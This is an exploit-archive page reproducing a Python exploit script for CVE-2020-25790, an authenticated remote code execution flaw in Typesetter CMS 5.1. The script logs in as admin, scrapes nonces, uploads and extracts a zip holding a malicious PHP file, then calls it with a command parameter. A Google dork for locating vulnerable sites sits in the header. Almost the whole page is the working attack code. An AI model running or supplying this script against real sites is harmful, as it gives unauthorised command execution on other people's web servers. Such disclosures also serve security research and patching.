扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 |
# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution # Exploit Author: Rodolfo "t0gu" Tavares # Contact: @t0guu (TW) # Software Homepage: https://www.typesettercms.com/ # Version : 5.1 # Tested on: Linux / Apache # Category: WebApp # Google Dork: intext:"Powered by Typesetter" # Date: 2020-09-29 # CVE : CVE-2020-25790 ######## Description ######## # # The CMS Typesetter has functionality (web interface) where it is possible # through an account with privileges to perform uploads. Through this # functionality, it is possible to upload a .zip file that contains a # malicious .php file. In the same functionality, there is also the # possibility to extract the file through the same web interface, the # attacker only needs to extract the .zip that was previously loaded and # click on the malicious .php file to execute commands in the operating # system. # ######## Exploit with Poc ######## https://github.com/t0gu/CVE-2020-25790 ####### Code ####### # see the poc at https://github.com/t0gu/CVE-2020-25790 import argparse from bs4 import BeautifulSoup import requests import sys importre import urllib3 from urllib3.exceptions import InsecureRequestWarning banner = """ ██████╗██╗ ██╗███████╗██████╗██████╗ ██████╗██████╗ ██████╗ ███████╗███████╗ █████╗██████╗ ██╔════╝██║ ██║██╔════╝╚════██╗██╔═████╗╚════██╗██╔═████╗╚════██╗██╔════╝╚════██║██╔══██╗██╔═████╗ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝██║██╔██║█████╗ █████╔╝███████╗██╔╝╚██████║██║██╔██║ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ████╔╝██║╚════╝██╔═══╝ ╚════██║ ██╔╝╚═══██║████╔╝██║ ╚██████╗ ╚████╔╝ ███████╗███████╗╚██████╔╝███████╗╚██████╔╝███████╗███████║ ██║ █████╔╝╚██████╔╝ ╚═════╝╚═══╝╚══════╝╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚═╝ ╚════╝╚═════╝ by: t0gu usage: main.py [-h] -p PASSWORD -l LOGIN -u URL ==> Exploit for CVE 2020-25790 optional arguments: -h, --helpshow this help message and exit -p PASSWORD, --password PASSWORD ==> admin password -l LOGIN, --login LOGIN ==> admin login -u URL, --url URL ==> main URL """ print(banner) menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790") menu.add_argument("-p", "--password", required=True, help="==> admin password") menu.add_argument("-l", "--login", required=True, help="==> admin login") menu.add_argument("-u", "--url", required=True, help="==> main URL") menu.add_argument("-f", "--file", required=True, help="==> Malicous zip file with php file inside") args = menu.parse_args() login = args.login password = args.password url = args.url file = args.file PROXIES = proxies = { "http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080", } class Exploit: def __init__(self, login, password, url, file): self.login = login self.password = password self.url = url self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari" self.file = open(file, 'rb') def get_nounce(self): try: url = self.url + "/Admin" r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False) data = r.text soap_obj = BeautifulSoup(data, 'html.parser') for inp in soap_obj.find_all("input"): for v in inp: nounce = v['value'] if nounce != None or nounce != "": return nounce except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') def get_hash_folders(self): cookie_auth = self.get_cookies() hash_verified = self.get_verified() data_post = {'verified': hash_verified, 'cmd': 'open', 'target':'', 'init': 1, 'tree': 1} try: url = self.url + "/Admin_Finder" r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth}, timeout=10, verify=False) json_data = r.json() hash_dir = json_data['files'][2]['hash'] return hash_dir except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') def get_cookies(self): nounce = self.get_nounce() if nounce: try: url = self.url + "/Admin" data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login, 'user_sha': '', 'password': self.password, 'pass_md5': '', 'pass_sha': '', 'pass_sha512': '', 'remember': 'on', 'verified': ''} r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False, headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'}) cookie_admin = r.headers['Set-Cookie'] cookie_name = cookie_admin.split(':')[0].split('=')[0] cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0] if cookie_name == None or cookie_name == "": if cookie_value == None or cookie_value == "": print("==> Something went wrong while login") else: data = f"{cookie_name}={cookie_value};" return data except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e: print(f'==> Error while login {e}') def upload_zip(self): url = self.url + '/Admin_Finder' hash_verified = self.get_verified() hash_dir = self.get_hash_folders() auth_cookie = self.get_cookies() try: print(f"==> Uploading file: {self.file}") data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified} r = requests.post(url=url, verify=False, timeout=10, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, data=data, files={'upload[]': self.file}) hash_file = r.json()['added'][0]['hash'] self.extract_file(auth_cookie, hash_file, hash_verified) except (requests.exceptions.HTTPError, requests.exceptions.Timeout) as e: print(f"==> Error while uploading {e}") def extract_file(self, auth_cookie, hash_file, hash_verified): data_post={'verified': hash_verified, 'cmd': 'extract', 'target': hash_file} try: url = self.url + "/Admin_Finder" r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) name_file = r.json()['added'][0]['name'] print(f"==> All Hashes are collected from: {name_file}") self.xpl(auth_cookie,name_file) except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') def xpl(self, auth_cookie, name_file): try: url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id" new_url = url.replace("index.php", "") print(f"==> Try to exploit: {new_url}") r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) pattern = r'<pre>(.*?)</pre>' m = re.search(pattern, r.text.replace("\n", "")) if m is not None and m != "": print(f"==> Vulnerable: {m.group(1)}") except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') def get_verified(self): try: url = self.url + "/Admin/Uploaded" auth_cookie = self.get_cookies() r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) data = r.text pattern_regex = r'"verified":"(.*)"}' m = re.search(pattern_regex, data) if m is not None or m != "": return m.group(1) except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') if __name__ == "__main__": obj = Exploit(login, password, url, file) obj.upload_zip() |
体验盒子
